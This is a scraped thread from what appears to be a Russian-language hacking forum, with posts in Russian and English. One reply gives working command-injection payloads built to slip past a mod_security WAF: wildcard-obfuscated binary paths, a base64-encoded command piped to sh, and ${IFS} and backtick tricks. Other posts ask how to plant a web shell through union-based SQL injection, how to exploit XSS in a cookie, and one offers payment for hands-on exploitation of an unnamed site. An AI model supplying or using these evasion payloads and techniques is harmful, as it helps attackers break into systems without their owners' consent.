
15.04.2019, 19:16
|
|
Постоянный
Регистрация: 18.03.2016
Сообщений: 663
С нами:
5344886
Репутация:
441
|
|
Сообщение от man474019
↑
hi all
os command injection in post data, mod_sec waf..when try echo test, it works
but when try uname, ls, pwd, dir waf deletes command, what real advice ?
Hi, try this:
Код:
/b?n/?s /
/b?n/un?m?
/?in/e??o "bHMgLWxh" | /?sr/b?n/b??e64 -d | /b?n/?h
|
|
|

16.04.2019, 17:08
|
|
Постоянный
Регистрация: 18.03.2016
Сообщений: 663
С нами:
5344886
Репутация:
441
|
|
It seems that there are some unknown logic on backend, not traditional WAF. Try to fuzz and detect the white/black sequences and conduct the attack vector in accordance with the circumstances. For example:
Код:
;id;
`id`
;sleep 100;
`sleep 100`
uname${IFS}-a
echo$IFS"bHMgLWxh"|base64$IFS-d|sh
`echo$IFS"bHMgLWxh"|base64$IFS-d|sh>log.txt`
and so on...
Also check this.
|
|
|

16.04.2019, 19:19
|
|
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
С нами:
5797046
Репутация:
40
|
|
Сообщение от man474019
↑
@crlf
thank you for reply, I tried these variant for reading /etc/passwd, and now also tried your variants, but also WAF cuts functions (((
request
response
А ты чего ожидал от твоей команды ?
|
|
|

23.04.2019, 12:34
|
|
Новичок
Регистрация: 14.12.2018
Сообщений: 12
С нами:
3903446
Репутация:
4
|
|
Подскажите как загрузить шелл через SQLi
union based иньекция
FILE_PRIV = Y (5.5.60-log)
Включен --secure-file-priv соответственно into outfile не рабоатет.
|
|
|

23.04.2019, 16:04
|
|
Новичок
Регистрация: 14.12.2018
Сообщений: 12
С нами:
3903446
Репутация:
4
|
|
Сообщение от man474019
↑
hi
see if magic_quotes_gpc ON or OFF
you must find writable path/folder to upload your shell
and also you can try LOAD DATA INFILE
Yes i can upload file data to table, but im looking for way write data to file.
magic_quotes_gpc = off
|
|
|

23.04.2019, 17:35
|
|
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
С нами:
5797046
Репутация:
40
|
|
Сообщение от xmp
↑
Подскажите как загрузить шелл через SQLi
union based иньекция
FILE_PRIV = Y (5.5.60-log)
Включен --secure-file-priv соответственно into outfile не рабоатет.
попробуй переопределить, но скорее всего никак
|
|
|

23.04.2019, 17:57
|
|
Новичок
Регистрация: 14.12.2018
Сообщений: 12
С нами:
3903446
Репутация:
4
|
|
Сообщение от BabaDook
↑
попробуй переопределить, но скорее всего никак
Запись на включение находится в /etc/my.cnf
Верно понимаю что ты имеешь в виду?
Сообщение от None
mysql>
SHOW VARIABLES LIKE "secure_file_priv";
+------------------+-----------------------+
| Variable_name | Value |
+------------------+-----------------------+
| secure_file_priv |
/var/lib/mysql-files/
|
|
|
|

23.04.2019, 18:05
|
|
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
С нами:
5797046
Репутация:
40
|
|
|
|
|

30.04.2019, 20:14
|
|
Постоянный
Регистрация: 18.07.2013
Сообщений: 300
С нами:
6747446
Репутация:
32
|
|
Есть уязвимость, Cross site scripting в куках
GET site/eta.php HTTP/1.1
Referer: https://www.google.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/45.0.2228.0 Safari/537.21
Cookie: cache= Cross site scripting
Есть пример эксплуатации такой уязвимости ?
|
|
|

30.04.2019, 22:50
|
|
Новичок
Регистрация: 05.12.2018
Сообщений: 16
С нами:
3916406
Репутация:
0
|
|
Может ли кто попробовать раскрутить уязвимость руками, в sqlmap никак не идет, но думаю надо руками. Сайт скину в личку. На пиво скину)
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|